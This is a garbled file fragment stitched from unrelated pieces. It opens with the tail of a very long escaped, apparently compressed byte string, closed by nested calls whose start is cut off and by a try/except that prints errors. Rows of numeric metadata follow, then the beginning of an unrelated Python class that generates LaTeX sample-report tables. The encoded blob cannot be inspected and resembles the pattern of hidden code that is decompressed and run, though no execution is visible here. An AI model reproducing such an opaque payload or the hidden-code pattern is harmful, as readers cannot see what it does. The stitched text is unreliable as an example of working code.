xb5\nQh\xc2\x94\xf3\xdeH<\x1cK,\xe8\xdc\xf5\x9e_\x0f\x91D\x85|\
xf2D\x9b\xf0\x01\xd9;\x8b\xad\xe9b\x91\x86\x80\xc7\x10\x8b\xc6\xe8\xb9\xe56\x9e\x96\x82\xbd\xee\xc8\xb3\xe5\x87\x1d%\xd8[m\xb4Q\r\x1b\xeb:\x7f\n*\xa4=Z\x13Z\xcbQ\x0f\xf1\xaa\xa9\xfb\x87-X4)\x00\xd4 \x9a\x98(j2\xbf\xd8{\xb4}\x95\x0b\xd5-\x1e\x1f\x8b\xd0c\xb6G%`v\x0bTO\xa3\xd2G^\x95G\xa6\x7f\xf9\xaf\x1f\x98Xq\x98\xcf\x06^\x03\x1e;\xf3K\x9e\x94\xa44\xc2%\xd9\x8c^\xe1g\xdf-y+4\x99y>?\x85\xdb\xb4\xa2\xeb,or\xbe^4%\xaf\x80\n\xa0\xf7\xa3\xae\xc4\xa2\n\x1c\xf7[\xc9\xceo\xad\x01\x96b\xefh\x82\xb0t\xbe\x80\xd3\x17@Y5\xa2\x047#I\\GX\x1eA&\rwL\x03\xdb44j5m\xcd#\xf9]e\x9b\xd2$\xc9*\x83\x0e\xf64\xb7\xe2\xaa :\x0e\x19T4$\xeao\xc3a\xc9\xe0\xc5\x87\xd9\xdf\xdb~i\x94q\xb0yf\xbeV\xd6f~\x14\xe9[q\xda\xc9\xd0\xea\xefw\x14\xc3\x87\x8a\xac\xdc\xfb\x06\nA\xfc\xf0P\xb5\x03\xb9/\xf3:\x0e\xdd\x18$\x99\x8c\x01\xe7P\x7fG\xbeU\xc1k\xa3\x16$\x17\xe9bF\xa0\xdf\xf8$\xc2:\xdbj\xbd\xfa\xeeN\xef\xafr\xc2K\x91,\xeb\xe4c\xd2T\x0f\xfdIS\x07\xa9\x02\x15\xa55"\xba*\x852\x04\xf7iZw\x15\x08d\xa5\xbaX\xe3\x84\x02\x0c\xdf\xba\x96\xea\x1e\xf2\x93s\xb8\x12\x97\xc5Wj$:m\x08z\x83\xf4\xd6\x7fb\x98\xbc\xc7EA\x15\r:\x8b\xec\xe3\x92t\xac\x1c\xc8C\x90\n\x81s\xf0K%}\x82\x01j\x94\xf3\xa1t\xf0 \xc7\x0c\x0f\xb8O4\x90\xf0Ln\xc0\xf1,O5\xdc\x0c"\x1c>\xe6\xc9\xf3\xc16\x832\x16\xd1\xdc\x88\x9b\xea\x14+PbAp\x9e\xd0\xed\xd2\xa0`|\xeb\xcb,\xbd\xf0\x7f_K\x9b\xaf&\x99\x02\xe7\x10\xa4\xcd+\xf5^\xf0/\xcb\x9f\xec?\xa9W2\rnKtC\xb6\xde\xf3U\xb7)[\xb3b\xfc\xa3\xd8\xe6A\x99~\xa2Z 
\x11\xd1\x9e\x07g~{\xb4\x1f\x0c\xb5\xb5\x142\xff(U\xba\x89\x95JW\xa2\xf4\xe6\xe9\xf0\x976\xde\x94\x91\xb8e\x885(\x82\xb1\x07\x9e\x8c\x05\x10r\xca\x10\x9fj$g\xa6n-\x0b1M\xb81\xd0Ww\xd7pxp\x86*h\x8f\x86\x11\x8d\x8a&A\xccq5\x10\xdc\xf14\xcf\r(\x85\xe5\x864/\xf8\x0e\'Q\x91\xa0\x85\xe8\xfcP\xc3\xa6\xe1R\x1cmj\x9c\x15gK\xa3\x02\xa5\xaa\t\x19sE\x05:\xe7\xf8\xb5\xee#\xe0\x9c\xc8gh\xf40\xd1\xe5,\x9e\xbc\x87\xa9\xbd\xa5\xfe\x80\xfcW\xe2\x9d\xa1\xdb\xcb\x07j\xe2X\xde\xd5\x13\x1a\xffqn\x18H\xfd\x10\xdd\x12#\xe7\x19\xb3\xe3\x97m.t)\x96\x03H\x04\xc9\xb9S\xc9\xd6\xf0\x00\xcf?\xf9#9\'\x88\xd3T\xdfC0\x0b\x9c\x82\xcd\xefyE\x184A!*\x12\xa9\xb1\x01\nz\x1cF\x9f\xfb:\xdc8\x89m\x10b\x1f\xe2\xbb\xea\xea\xa5\xcag\xf0\x0f\xc8vt$\x963\xcb|?\x90=\xb1:\xa0v\x89\xcf\xd64\x07L\x1e\xc4\xcfuA\xa3\xe2\xdd\xd3y\xcc\x03\xea\x87o\xe6\xf4\x8d*2h\x82/D#\xe7\x90\xa6X8Z\xd60\x91\xa7\xc9\x07\x7f\x83"d\x1b\x18\xcc5bDs\x1b\xb7\xc9\xe1\xb1B\x8f\x8c\xff\x1aE\x8a\xf9\x7fFq\xd8\x7f\x94\x14(E\x86\xcaBY\x19\xb1\xaa\xf0|\x9d\xf7^:\x7f\xbe!\xfalr\xeb\xbfM\x80\x8e\r\xa3\xc5\xb8\xb9\xb3<4\xf7\x88\xe4\x06A\xc5XR.\xba\xd4m\xa9/$\xf9\r\xc3\x99\x98\xbc\xa0D\xf1\xa22\x1c\x8a\xeb\x01\xff\xdc\x94\xcd\xd2\x14@+\x14\xc86\xa9\xfc\xcc\xfc\xf8\xc7\xba\xb8\xc4\xdd\x1b\x86\x1a\xdf\xec\xe8\xc0\x10\x95\x84\xa6\xd6\xc4\xf0\xc1w\x8a!\xc5-\xc5"vN~\xeb1\x1c\x8b]S\xde~\x91E\x9d\xcf\x03_y\x8ad\xbf\x08\xfb\x03\x18KL$\xaaB\xf6\x92\x14\xf2\x9e\t\xbcH\x1d\xe3\xa4l\xb8\xc9w\x90- 
?8\\@\x88?\x14\xca\xac\x92Cw\x99\xb0\xd2\xbb\x96\xa1MYl\x1f+\xb5\xa6\x0e\x895B\xa9\xc1\x96p\x06\x86\x1b\xd5\xfa\xd2\x8c\x1c\x13\xeeW\xfb\xa4\xd8\x9a\xcd\xc6\xaf_:\xa4\xe9i\x1b\x87\x84\xb6O#\xdf\xf9\xac\x1f\x07\xe4Uh\xacJ\xeeXy3\x06\x91\x04t\x8a\x92\xe9*\t!n\x80g\xfc\xf9\x942\xf1\x82\x8c\x8aE\xbay\x8eX\x8e\xec\x0f\x89+\xf2\xb1\xa6[l\x9914\xf3\x15N\xf3\xf8\xf7\x0f\xa9\x10rA\xe7M\xaa\xdc\xb3"\xfb\xf6P\xdb\x9d\x7f\xaeg\x83mz\x7f\xcf_\x15\x1bz<\xac\xe9th\x05yM\xdd\xcf\x1fd\x9e\x88\'\x88c\r\xf7\xe1e=\xf79$\x1a5_f/D\'bK4}W\xe3\x1c\x07\x80\xd0B\xe3\xeb\xdc\xa1$\x07\x85\xc0W\xb3\xf6\x12\x17\x15\xb0\xa7\x87\r\xf0\x90.h\x85\xd4Bl#?\x92?\x17EE\xc0\x9dI\xa5\x92\x0b\xc1\x8b\xde+\xf9\xea\xcd\x00V=\nq\x1e\xff\xe4\xdaNJ\x89\xc6\x93\xa0O\x8a\xc9_\x8a\xdb^J/ZD\x84\xab\xbf\x1f\xcb\xf7\xcaS\x9d5a\xe5\xf8_\xbe\x98q\xfcS\r>O-4\x020\xe7\xa0\xc7J\xfd\\\x85~\xe7\xf0\x9f\x8cX\x92D\xa0^\xa8\x11uK/\xfd\xeaO\x9bj_V\xe7\n\x00\xcf\xafE<\x12}\xc0\x91\r=\xabC\xba\xbb/+\x1bKc>\x16P\x0f=\xed\xf3\xc5\xb7?:y\xd3\x97N@\x14\x85H\xe9\xd1\xa5:\xe6\x8e\xc0OE\x80\xc72Z\xaa\x02X\xca\xad\xe4F\x9e0yH\xaa\xc4\x0f\x8e\x05!\xf3`\x1f\xf8\xa3i/\x15"\xb0\xc4\n\xc9\xc2\xe4$6\xda\xbc\xd1\xdf\xd4\x1a7\x96]`p\xd0\x96\x86Kh\x90M\xc20\x1dV\xf9P<\xc6\xf1r\xa0\xf9<\x99o\x83\x8d"\n\x19\xb1\x9bV\xd8\xea\xf3\x9c\xd8\xe9\xcc\xb2V\x9cL\xd9-|\xb6\x18\x8c\x92\x062\xe6\xac\xb2"}t\xf2\x1b\xbfe\x90\x87j\xc2\x10\xed}\xeb\rMW~\xd1N\x89\xe2*\xd5\xd4\xc4\xe0\xf9b]\xb2\x1c 
\xe9\xd5\xf8\x8d*\x8c\x89\xebr\xb9\xa59\x15\x08e\xaf;\xb0\x9f\xe1`\xd0\xc1\xb5-\x1eQ\x0b\xc4q\xb7)\x19\xf3\xfcf\xe6\x9b\xfa\xddB$1\xc8\xb3H\xcd\x85\xf84N\xbf\x8a\xff\x9b.m\xcdj\xa4\xd3`\xe3\xe4\xee\xa9A\xacgU\xff\x13\x89\xe3\x8c\xaa\x1f\xc6\xaa\xc6y\x1b\x19\xe0\x98\xad\xdc\xeb\x9f_\xffj9\xbe\xf43\xe2\xb4C\x95gl\xd7\xbf\x0b\x130m$c\x93\x9c\xff\xda\x13\xf8\x9e\x83\x11\x0evS\xc5\xcf\xf0\xfcFQ\xa1\xb5\rD\x97A!\x89\xddgvY\xaa\xd1\x8e\xe4O\xae~?-gfj\xfd\x8eE\xa2\x01\xe6\xee\x0c\xa0\x03\xc0\x9f\x15h-\x95,\x94\x8c\xb7:}$\xfb\xa0Z\xa4g&[V\xef\x87\xd4*i0\xcaD9\xf8\xc7\x96q\x9bQuoQ\xee\xbe\xcf\xe8J\xa5\x02\t\xb2a\x82^l\x14\xaf7u|\xa8\xa2\xa9\xc0\x10\x8d\xc3\x8e\x9b\xf0\xc9\x01\xf3\xa2\xe9\xben\xb5\xe9F\xf9\xd7\xb92}\xa2\xea\xe5\x8elt\xadR\x1a\x89s\x00\xffi\xec\xab_b\xb4!\xba\xb3T\x8bUf\xd3\xb7\x8a\xbfr\x81\xc7=\xae@^P\xda\x8c\xf9\x83Q\xbb\xcbC:\xd0\xdf\xb5p\xd4\x8fo\xe8\x8c\xed\x08\xf6\x95\xce\xdaa\x1f\xa9\x94\xd5F\xff\xe0\xd4/f\x1d\x14.\x1e\x1b\xd29\x95\x88\x17"\x8fcG\x7f\xd0\x0e\xce\x9c\n\xfc\xe0B\x03-\'qc\x05\xddH\xd4\x95\xf3!\xafe$\x9fj#\x02Y\xd8}\n\xa9j\x1b\x95Qp!\x89\xbd\xd2\xf3\x91\x8e\x95bE\x90\x04\xc5:\xebG\x9f5F\xa8\x95:\x19\x8b\xa6d\xa9I4m\xbe\xbai\xd6\xd2^?\x99\xc6T4\x16{\xbcq\xe7I\xdf\xafs{\xd7\xec\xf5\xc4\xd1\x08h@\x18\xff\xc6m\x0eWT\x07\xd3\xf2\xbd\xe0u\xfd\xe2\x97&\xcev\x1b\x1c\x96\xe6D\x98\x05:4r\xf4\x9c\x14\x1d\xe5?9\xa2\x920Z\xb9\xc6\x94)=\xb66i\xf8/UW\x1cR?G\x03\xc7\x06g\xb3u\x9d\x81^\x7f\\g\x07\x8c.J\x08\x04\x9a\x8a.\x94\x89\x99\xff\xb5v\x1f\x95\xfah\xb7\x91/]pQ\xed\x8e\xcb\xe3\xbd\xb6\x0f\xbe\x1d<U\x82\n\xad-.\x11$\xdc)\xc4\xa5\'\x95]\x1c\xb5H\x96u\x8d\xbd\x12\x9f\x80U\x19\xach\x1a\xa5Z\x85\xe0\xc8\xa6\x9c+\xc5\x07`\xe2\xe5P\x98\x9e\xae\xea\xb9\xf2saR\xb7\x9f\x0b1I\xcf/\xb5\x11+>\xbd\xe9\x06l\xe7\xb1\xfa\t\xac+\'\xfe(\xfb26\xe5>\xa0\xe65\x8b\xe1\x02:v\xec\x924N\xf6\xce/\xebcm\xb2\xafK\x9f\xcc\xecB\x8bLs\xb4\xea\x1c\xe2\x08P\x95\xd8Ow\xa7\x07\xfe\xa4\xff8\xbe\xcba2\x8a.\xffp\x9b"K4U\xe7\x1c#\x0e\xa313\xab\xa0*\xd5y,\xef\x15u\x8f6\x02\x96\xcb\xfe#\xd16"\xf2
G\xee\xda\xf3\x91\xcc\x8ed%`\xe7\x12\xb6\xf0y\x13\xeb"\x96E\x98\xeb\x02\xf4B\xab\x18\xb2\x1ai}V\xf4\xfa\x87?\xc5\xcd\xc0\xb8\xa1\xd1\x82v\x01\xbaUS{\x1f\xd1(F5\x8b\x84\xa2w\x1cO\xaa\xc2\x90\xe9\x92\xad\xde\xe6\xfdwr\xba\xe4\x15F\x96BM{]K\xea\x90\x1c7\x9d\xac\xc2\xf8x\x1a}\xa2\xce\xc9\xf3\xab\xe7\xba\xc1\xcdp@U5b\x8a\xcf\x81\x89\x97r\x88pv\xee\x8b\x04\xe1jYH\xa1\xec\xfe\x9c\xab~\xad\xb7Z\xb3\xb8i\xed\xd6j\x19\x8e3\x8a\x8b\xa47\xe5\xe1E\x9d0\'\x1bY\xf8Flp)l]\x14\xc6#\xbc\xc3i\x81\xbab\x94\xf8\xd7\x8c\x06\xa0\x84F\x15\xf0\xe3\xb9@\x0f\xd7\x87\x95\xa2"\xed\x1c\x15\x18|v\x875\xbb\xcdo\x04\xcf;\xb3\xbd5$\x8b\x18o\xfbON\xaa\x06\x85%\xceQ+\xa5[d\xa1\x0e-:\xa3\x80\xeb\xa8\x11\x134Z\x81\xc5^9\xca\xaff@\xed\x89\x94Bg\xcdvp\x85\xc0\xe94\x0co\x89\x98\x82@\x80\xc3\xe5\x99\x02c\xcb\x96\xc0\xcb\xe7\xad\x19\xfb\xa8pr\xf69\xd8*\xaa\x91\xcbI>\xd0\xa9pt\x9b\x85\x9c\x0e\xe1\x15w\xcfQ&\xd4W\x15\x01S\xd0\xe0_k\xe07IK\x16+\xd84\x17\xec\xc7@\xa6\xaf\xdaeP\x946\x8a\x1b\xa1N\x8c\xb0p\xad\xe6\x97\xb1\xa1\xc9\xd54D\xdc\xac\x1e\xc9 
;\x14\xe8\xa6P\xdc\xaa\xb3\xc6\x98dE\xd3j\xc7\xf5\xa3\xa8\xdf\x1e81\x9d\xd0\xc7\x05\x15S\x89U\x89+T\xc8\xdb"\x92\xf7fT\x8f\xd1\xcfm\xfb:8S,i\xdcX\x86X\x85y\n\xe15\x81$\xcf\t\x82P\x92\x83yC\xe5\x1c\xd7D!\xf1\x819\x86l\x8a\xb6\x03\xe1\x86:\xb0T\x9e\x06\x85\xf0{#\xee\x0c\xc1\x18\x16\x0cr\x8d\xaf%\xf0\xf7\xc6\x9c\x9a\xbe\xb2-\x07\xbaO\xa7\x8c\xf2m\x1b\xd5v\xd7\xb1,\\\xeb\x00b1\xfb\xfb\xd3OA\xf1e\xd2\x1a\x12\xd6F\xca\xddR,Q\x97\x06y\x02\xd4_N\xec\\\x13\x03h\x05[-\xaa\x83\xcf\xd7\x93\xd9\xd6\xef\xdf$\xb3\'\xf8~\xa8\x1e3\xe8\xe6\xea\x91W\x9at\xcab\x87\x81=zf\xad\xf6\xb3\xc6\xbd{;=\xdb;Fc\x93"\x03\xd0\x1c\x8ba\x9b\xf4Y\xe3\xe7\xeaV\xc8\x9cQ\xf2-\x191\xc9\xbcX\xe40+n\xb2\xa5u\xf1Fb\xfa\xbf\xd8\xf5\xdb\x83Y\xdf\xeb\xb9DS\xc8\xd4\x1d\xc8\x1d"m\xad\x1f\xd8\x14\xb0\xebFO\x96\x0f-\xdf\x9c\x06\x89\xde\x07\xa0\x92LF\xc5YW\xd2|\xac\x01\xf5\x80l\x13\xae\xd6k\x05r;\x1c\xe4\xd6e\xfb\x8b?\xbe\xbe\xddU\x92G\xe7n\x8b\x04\xc4[I\xbe\xe1\xd3\x8f\xde\xd0\xc1\xe4Z\n\\\xd0\x83\x02s\xa4\n\xe6\x9f\x8aXfE\x1d"\xa3\xe4\xa2d\xed\xa4\x97\x8cLH\x8d\xeaN\xdfcug\xcb\xbe\xfd\xf0\xc2Y\xed\xef\x91&\xfb\xb5\xc4\xc04\xe5\xb3\xfd\xc9\x1eb\x99\xc8\xd6\xa1o\xe8B`\xa84\'_\xa8[(\x99`<3\xdbVh6;&\xb4\x02\x15~\xf1<\x93\xed/\xc7\x0eo\xe5\xe3\xeb\x94\x19\xde\x91\x9bN\x19&\xd6\xb5\xf4u\x8ag U\x95\xf6<\x0f\'V\x82\xbe\xec\xe7\xc1\xc7\x1d\x8d;\xcb\xf3Y\xb1":\xad\xba\xd9\x95\xa2\xa2\x16\x11l\xdf\xb9zd\xaem\xd5|EQ\xc0o\x81\xedd0\x84i\xfa\xeb\xad\xc5\\ \xd8\xb2\xcb\xc5\x93\x9e\x92\xb0-\x02Z]=G=\x93\x9e\xa8\x82\xf7\xee\xcf\x8f\xee\xed\xebf&G\xb1\xde\x8aZ9|\xd6t\xa4\xc7\xc0_\xe15ic\xd9\t\x826\x1c\xdf\xa0\xa4\xc5:\x86\xaaruR\xb8}=(\xd5Den\xa8\xc1\x01\xc1\x18\x8e\xfcl\xfdd\xad\xe4\xa2\xbf\x88\xeb\xa3\xc3P\xd2%\xb9v\xe1\x10pb\xfds1cr\xd2\xf1\x0b\xed\x8c\x9aR\x15\xf2\xae%<!\xda\x187\xaa\xce\xa6\x8aM\r\xd0\xb8=f\x17\xbd\xe3q\x88\xc5\xc2 
\x942x\xb1\x03\xf8\x01\x92\x14\xdb\x99AZd\x11\x07\xca\xc2I[\xdb\xda\x04Q\xdf\xd0F\xdadT\xc3vq;#\xe52\xd4\x8a\xef%m0\x99\xbd\x15\x0f\x81\xf3J\xd0\x85\\=\x94\x17\xff\xc1\x0c\x92\xc3Z\xc6\xebd\x0c\x90\xec.\xe1jWg\xed\xad\xb6M2!?&\x1e%\xf50\xf6\xffH\x85\x93\x8b\n\x0c\xce!\x99/\xb5\xdf\x12\xd4LF\x0f\xa5\x98i&\xde*0N\xb6\x9cQ5\xf7A4K`\xc46\xdb9U/AE\x06\x9fg\xaaRmg\x97\x17\r\xfc\x11N?p\x91\xe9\xc6Mb\xdd\x99\xf6\x026\x80\x17\xe3\xd7\xd2\xbaI^\x11\xd9\x8f:9\xbb\xcb,\xc5\xa1t\x84\xff\x89\xd7\x83\x94E\x16\xb2\xa1\xe1\xf8Q\r\xd3\x99pUYC\xb9\xa6\xeeu\xf1R\x1ec54\x19\xb5L\xcd\xaa88\x16sDN\xfb\xa3\x80\x9bs^\xa1I\x14\x91\xf1.\x95\xe9\x9c\xeb\x1e\xe9-\r\xec- \'&m\xbaB\xe5B\x9c9\xef\xae\x03\xdd\xea^\xa8i\xb1:\x1e\xe9\x8b\xb2tD\xc3\xf1\x1b/\xce\xd0p\xac\x1e[\xd0kr\xbf\xfd\x12\xc2\xc9\xe7\xf5\xb8\xf3\xbc\x1fZR\xc7\xa2\x08F\x1f%\x82I\x91Y\t\xc6\xce\xa1\x1c\x1ba\x06_:v&\xcaA\xfcO\n\xa7\x98\xf9\xcc5c\xdc|3\xc7\x0c\xa5g\xb0n\xac\x10SCj\r\xb4\x13E\xf6R;|g]\xe0]G\xd2\xfeZ\xa3&>a\xb0\x8f\n\xfe\xba\x01\xdd\xa9\x00\xea\xbbn\xf1\xe7\xa1\x14\xb2\x0c\x15\xb8\xdb\xaa\xe6\x95\xf8\x9a\x07c\x91\xe6\x9fp\xd3\xa8\x18\xea\x84\x92\xed\\\xe4\xbeL\xc0f\x04\x87fv\xca\x99\x1e\xd7\x94\xa2\xae\xe2\xb1\x802\x87a\x1f\x1e&\xdb|\x82\x03\xa4\x1d\x91\xdb_\xa2\x8e\xd4\x92\x95"\xfd\x80\x93\xdb\x0e1\x85rBY\x98u\x01\xcc\xbciF\xaf\xc9\xd2{\x86\xe5\xf1\xeer\x0b5-\x82\x9d\x88\xdf\x14\xf0\xa7+\xb6Qr\x94\x8b\xc7\xbd>\x8am\xcc\x0c#%\xe6\xde\x9b\xe3S\xb1<\xa8\xe8fJ\r\xd1eq\xce\xa5\xf8\xa1\xcal\xcf\xab\xf8\xd7?(\xb9\xadf\xbe\xe2\xa2\xa1_&\xa3V\xaa\xe9\xdc\x95\x8a\xacn[#{3\x8f\r)\\\xec\xf4\x06`\x16\xa8\xec\x8b4\xd6t\xb9\xc4fjL\x88\x9b]\x17e6\x16~Q\x01\x8f0\xe3\x9a\x16v\x9b\xf8?\xe4&\xc4\xf4u\n\x19\x9e\xaa(KI\xd1\xc8\x9a\xabTJ\x13\x8d\x0f\xa9\xd4\xdcn\xbbmn3\x01\xca|\xf1G"7l\xaf\xf7\x18\xe6\x833 
Nlq\xaa"\xd2\xe1\xb6\x17\x8a\',\xa4\xc9a\xa6\x05\x1f\x9f1\x89\t\x04\xc6\x17\xcaM-e;@\xe3\t\xc2\x84\xcb\x97\x02\xe7PG\xdaf\xabTG\x1c\x85\xc8\xc6nKw\xb1\xe9\xa6|\xde#\x94\xbf\xc9k\x86\x0f\xce\xa9c7-\xf3\x85}h\x81~\xcc\xf2\xa8\xd0p\xb0\x89Z&\x18\x87\x90\x8c\x0e]i=\xaa8Q\x15\x19\xb2\x96\x8f\x1di\xa6vMx\x99t\t\x94\xa8[i~s \xee\x8dZqR|\x94O[\x07\xf5\xb0@\x95\xca\xb4\xa9\xdb\xc1\xc4\xaaV\xf9\x10\xc8\x13\xb56\xd4:(\xeb\x13\xc1)\x92\x1e\x12K\x15\xc9\'V\x02\x99K[2b`\xf47e\x1b5W\x89x\xca\x1d\xa2\xd1\x99%\x0eE)\x86\xb1\x85\xfd\x9eIw\xa2\x97Jd\x05\x97\xa1>\xfe\x84\xec1\x0f\x9e\xaaV\xae\xa5q\x8a\ty\x7f\xd7\xdc\xb6n\x89\x00j\xdb\x1f\xf9;|\xbf,\x88\xdd\x8e\x898\xe0\x17\xcaWR\x85\xba\xfb\xab\xe2\x1du\xd8\x96\x8eh\x88E\x1b\x9a\xd5L \x84(\x92\x95\xec|i\xc4"\xbfy\'\xb2\x04\x9bhw+\xe4\x96J\x00\xb9\xddE\x19?\x85\x92l\xe9\x9c+@\xbe\x10\xe6C2\xba\xf8\xd9\x91\xbe\x04\x95\xf9z\xa5B\x7fGj\xa0^\x83)r\x02\xd2\xaa\xaa\r/(\x82\x1eS\x11f\x14\x99\xc4*\x11t\x8b"e1WbRQ\xc9[\xb7\xbf\x1f\xa2\xc1\x8c\x96H$@\xb0d\xee\x8c\x93\xc1\x91~P\xc8\xaa\xc5\x08\x8d\xbe\xdf\xe2\xc3\x90E\x81\xceu\xda\xf2\x98\xe3\n\xb1B\xee\xf9\x9bU\x1eAJ!\x8b\xdcV\xc8,;yS\xf7\x1e]\x8a\xf8\x802\x9c\xb3\xbb\xe8\r\\\x8f@\xc9\x8aK\xeap\xf6\x87\x89)\xac\\\xd3\x14\xbbL(G\xd9\xd1\xd1\xa2YESo\x7f\xf7\xa7Q\\\x8f\x0eL\xf6zp\xe1)!b\x8c;\xad\x13>u\x94\xc8fr\xfa\x88t\xa2\x91\x8c\xd5\x85k.\xe3?j2\xe0\x1c\x1b\xe8\xbf\xac\x908\xe6\xc8\xe4@\xf4O\x89PHza\x15\xbfm\x05.{\xb7\xf3\xe7\xea\xae\x8b\xacM\xd8\t\xce\xfbM\xa7\xd1\xbe\x1d\xeb\x87Y\x9b9\xed\x17\x11\x08\x92ayT\xff\xbcD!=W\xc9\x97\x88\xdbH)\xfe\xa2\xd3_\xf2/\x1a-\xae<\xfc\xa6\x06\x9c\xc4\x93I\\\xd6oU\xdaG\xc9\x16\xae\xe0E\\\x84_3\xe2~\xc7\xff8\x04\x86^\xbajta\x1a\xed\xc5&\xfc\x96\xde\x99\xff\x12\xef\xce\xe5\x94\xeb\x1d\xc3\xeb\x84oV\x8b\xdb\xce\xa1L\x9a\x06\xcb/4\x99\x98\x92\x99\xa1q\x91<P\x85\xd4\x86\xc2\x06\x18\x87\xf3p\xebl\x0eJ\x9c\xcd\xa4@:\x81\xaf\x87\x88\x9e\xf6\xa5\x8a\xe8\x81t3\xde\x93j\xbaU.6\x00\xddC\x82\x14\xe5\xcb.\x13\xd4\x19uh\x1f\x06t\x85\xeeY\xb5\xc2YE\x00\xa1\xb8>E\xa6b\x95\\\x82/
\xed\xe0\x12\xc75\x85\xff\t\xbe\xb2\x1c8%\x9d\xe4\xbck\xb5CG4\xb8\xca\xce\xfb\xb2ufj\x14\xeeA\x12\x05\xd9U\'d\xc8\xf0g|c\x99\x9dV\xc9\xb9\x08#IPn\xe0\xfe\x04\x9c\x98\xbf\x96EYx_\xb1U\xe3\x1c\xd6\x97\xe4\xc9%I\xac\xd4\xc1*\xbf8M.~\x85\xbfW\xe9\x92E\xdd\x8bS\xddri\x04i\xc4\x96\xdc\xbf\x05\x7f\xcc\x8fy&\xe1\x1d\xa8\xccE\xd0<F\xfe"p\x18\xd3U\xda\xcc\xdd~|(\x8b\x00\x0e\xb6\xea\x83\x13>\xe7JF\xf0\xf6\x84\xdf\xe5A#\x84\xc4\xb8\xcfJ\xba\x89Z\x13\xbc\x08D\xd6(m\x1fO\x0e\xde\xf1\xb6\x05\x98\xbe\xe5\xa5\xb8\x95"\xf7Y\x11\xa9\xf92I\x13\\\x06\xc4\x94\x0cOyt\xdd;\x9f\xed\xf7O\xfa\x03\xd5\xef\x81@\x96\x1c\x18\x93:\x14\x7f\xeaV\xe5\x99\xed\x86+\x90\x1f\x95\xfd\xb3\x1f`\x19\xf0\x8fE\xb5w\\\x9e\xd5{{\xfas\xba{\xbdw\x1a\xfe\xff\xfap/\xbcHj=]\x9cx\xfe\xe1I\xd9\x9cyn[c\xeb\x93\xa3\xd3\xbe=\xf3\x7f>\x9f\xbd{&N\xcf\xf7N\x8e\xf5\xbbqx\x81\xec\xb4\xbfw|\xaek\x1e\xf5\xa9\xb8\x8b\xc2\x7f\xff\xef\x8f\xe1=\xdd\x05\xe8C\xfesN\x1c\x9d4\x17\x87vR\xb5\xdf\xfd\xef\x9e\xd1G\xf6\xfe\x8f\xa3\xc2tqy`\x15\x1f)\x9b\xbe\x88\xda\x07\xc0\xca(&T\x0e\xa5\x9e}\xff\n\x8f\xc6\xc6\xc6\xfe\xcf\xf2k\x0c\xdc\x7f\x9b\x81\xf2l\xa0z\xc1\xaf0\xea\x86\xee\xaf\xf7\x9f\xeav`h\xec\x7fG\x17\xbe\xfb\xe1#\x02\x00')))
except Exception as b:
print(f'Error for : {b} ')
| 16,855.181818
| 185,248
| 0.735501
| 42,523
| 185,407
| 3.200927
| 0.169297
| 0.000309
| 0.000132
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.231871
| 0.001386
| 185,407
| 11
| 185,249
| 16,855.181818
| 0.503278
| 0.000264
| 0
| 0
| 0
| 31
| 0.635687
| 0.633588
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.2
| 0
| 0.2
| 0.2
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
85583f8d3f70dfee06f91638026473b22639ed20
| 51,626
|
py
|
Python
|
Rover_Source_Code/Post_Generate/post_generate_single_methods.py
|
StavromularBeta/Rover
|
3030f1521e5a6bc2c6722983ca59a008b3a11400
|
[
"MIT"
] | null | null | null |
Rover_Source_Code/Post_Generate/post_generate_single_methods.py
|
StavromularBeta/Rover
|
3030f1521e5a6bc2c6722983ca59a008b3a11400
|
[
"MIT"
] | null | null | null |
Rover_Source_Code/Post_Generate/post_generate_single_methods.py
|
StavromularBeta/Rover
|
3030f1521e5a6bc2c6722983ca59a008b3a11400
|
[
"MIT"
] | null | null | null |
class SingleMethods:
    def __init__(self,
                 finished_reports_dictionary,
                 single_reports_dictionary,
                 sample_data,
                 latex_header_and_sample_list_dictionary,
                 loq_dictionary
                 ):
        """Store the shared state used to build per-sample LaTeX reports.

        :param finished_reports_dictionary: dict the generator methods write
            completed report strings into, keyed by sample id.
        :param single_reports_dictionary: dict of sample id -> report spec,
            where spec[0] is the unit type ('Percent', 'mg/g', 'mg/mL',
            'per unit') and spec[1] is the style ('Basic' or 'Deluxe').
        :param sample_data: object exposing ``samples_data_frame`` and
            ``best_recovery_qc_data_frame`` (pandas DataFrames).
        :param latex_header_and_sample_list_dictionary: dict of 6-character
            sample-id prefix -> pre-built LaTeX header string.
        :param loq_dictionary: limit-of-quantitation lookup; stored for use
            by methods outside this chunk.
        """
        # Output accumulator; every generate_single_* method writes here.
        self.finished_reports_dictionary = finished_reports_dictionary
        # Work queue: which samples need which report type/style.
        self.single_reports_dictionary = single_reports_dictionary
        # Source of sample and QC measurement data frames.
        self.sample_data = sample_data
        # Cached LaTeX headers, keyed by sample_id[0:6].
        self.latex_header_and_sample_list_dictionary = latex_header_and_sample_list_dictionary
        self.loq_dictionary = loq_dictionary
def generate_single_sample_reports(self):
for key, value in self.single_reports_dictionary.items():
if value[0] == 'Percent' and value[1] == 'Basic':
self.generate_single_percent_basic_report(key)
elif value[0] == 'Percent' and value[1] == 'Deluxe':
self.generate_single_percent_deluxe_report(key)
elif value[0] == 'mg/g' and value[1] == 'Basic':
self.generate_single_mg_g_basic_report(key)
elif value[0] == 'mg/g' and value[1] == 'Deluxe':
self.generate_single_mg_g_deluxe_report(key)
elif value[0] == 'mg/mL' and value[1] == 'Basic':
self.generate_single_mg_ml_basic_report(key)
elif value[0] == 'mg/mL' and value[1] == 'Deluxe':
self.generate_single_mg_ml_deluxe_report(key)
elif value[0] == 'per unit' and value[1] == 'Basic':
self.generate_single_unit_basic_report(key)
elif value[0] == 'per unit' and value[1] == 'Deluxe':
self.generate_single_unit_deluxe_report(key)
else:
self.generate_single_percent_deluxe_report(key)
return self.finished_reports_dictionary
def generate_single_percent_basic_report(self, sample_id):
temporary_data_frame = self.sample_data.samples_data_frame[self.sample_data.samples_data_frame['sampleid']
== sample_id]
temporary_data = self.get_relevant_values_and_recoveries_for_single_reports(temporary_data_frame,
'Percent',
'Basic')
temporary_table = self.create_single_basic_table(temporary_data, 'Percent')
header = self.latex_header_and_sample_list_dictionary[sample_id[0:6]]
footer = self.generate_footer()
